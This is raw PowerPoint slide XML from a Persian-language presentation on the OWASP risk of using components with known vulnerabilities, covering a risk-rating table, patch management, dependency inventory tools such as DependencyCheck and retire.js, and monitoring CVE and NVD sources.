                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>منابع</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fa-IR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>خارجی</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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MITRE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>عمومی</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>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Ruby Libraries Security Advisory Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>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a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نحوه پیشگیری از حمله</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>باید یک فرایند مدیریت وصله امنیتی در محل خود داشته باشید تا:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>حذف وابستگی های استفاده نشده، ویژگی های غیر ضروری، مولفه ها، فایل ها و اسناد.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>به طور مداوم  فهرستی از نسخه های مولفه های سمت سرویس گیرنده و سرویس دهنده (مانند چارچوب، کتابخانه ها) و فهرست کردن وابستگی های آنها را با استفاده از ابزارهای مانند </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>versions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DependencyCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، retire.js </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>و غیره. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>طور مداوم منابع مانند </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>CVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> و </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>NVD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> را برای آسیب پذیری در مولفه ها نظارت کنید. از ابزار تجزیه و تحلیل ترکیب نرم افزار برای به کار انداختن خودکار و بهینه سازی فرآیند استفاده کنید. به هشدارهای ایمیل برای آسیب پذیری های امنیتی مرتبط با مولفه های مورد استفاده، توجه کنید.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>فقط مولفه ها را از منابع رسمی بر روی لینک های ایمن دریافت شود. بسته ها ی امضا شده برای کاهش یک جز مخرب اصلاح شده ترجیح داده می شود. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> نظارت بر کتابخانه ها و مولفه هایی که پشتیبانی نشده یا وصله های امنیتی برای نسخه های قدیمی تر ندارند. اگر وصله کردن</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>غیرممکن باشد، یک وصله مجازی برای نظارت، شناسایی یا محافظت در برابر مسئله کشف شده در نظر بگیرید.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>هر سازمان باید اطمینان حاصل کند که یک برنامه مداوم در حال انجام برای نظارت، برچیدن و اعمال به روز رسانی و یا تغییرات پیکربندی برای طول عمر برنامه وجود دارد.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>استفاده از مولفه‌های با آسیب‌پذیری شناخته شده</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1815833403"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="235506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fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابلیت بهره‌برداری</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>۲</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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شیوع</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx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۳</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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابل کشف بودن</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1"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۲</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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تکنیکی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0"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۲</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gn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>در حالی که پیدا کردن اکسپلویت های نوشته شده برای بسیاری از آسیب پذیری های شناخته شده آسان است، اما آسیب پذیری</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> های دیگر به دنبال ایجاد اکسپلویت سفارشی هستند. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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just" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>شیوع این موضوع بسیار گسترده است. الگوهای توسعه کامپوننت سنگین می تواند منجر شود به اینکه حتی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>تیم های توسعه متوجه</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> نشوند</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> کدام مولفه ها در برنامه یا </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>API </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>خود استفاده می کنند، و همچنین کمتر آنها را به روز نگه می دارند.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>برخی از اسکنرها مانند </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>retire.js </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>در شناسایی کمک می کنند، اما تعیین نیازمندی های بهره برداری باید تلاش بیشتری</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> صورت گیرد</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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just" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
